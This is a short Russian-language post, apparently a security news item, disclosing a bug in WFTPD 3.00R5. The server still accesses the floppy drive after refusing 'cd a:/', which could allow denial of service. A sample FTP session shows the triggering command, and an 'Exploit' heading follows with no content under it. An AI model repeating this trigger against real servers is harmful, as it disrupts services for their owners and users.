Прикольный баг
обнаружен в популярном ftp-сервере WFTPD.
Сервер, несмотря на запрет, все равно
обращается к диску А:\, что при частом
обращении может вызвать отказ от
обслуживания.

Система уязвимая: WFTPD
версии 3.00R5

Пример:

> ftp localhost
Connected to xxxxxxxxxx.rh.rit.edu.
220-This FTP site is running a copy of WFTPD that is NOT REGISTERED
..
220 WFTPD 3.0 service (by Texas Imperial Software) ready for new user
User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
331 Give me your password, please
Password:
230 Logged in successfully
ftp> cd a:/
501 User is not allowed to change to a:/ — returning to /.
ftp>

Несмотря на отписку, что
доступ запрещен, сервер все равно
обращается к дисководу (а вы знаете, как в
Виндах это происходит :).

Эксплоит



Оставить мнение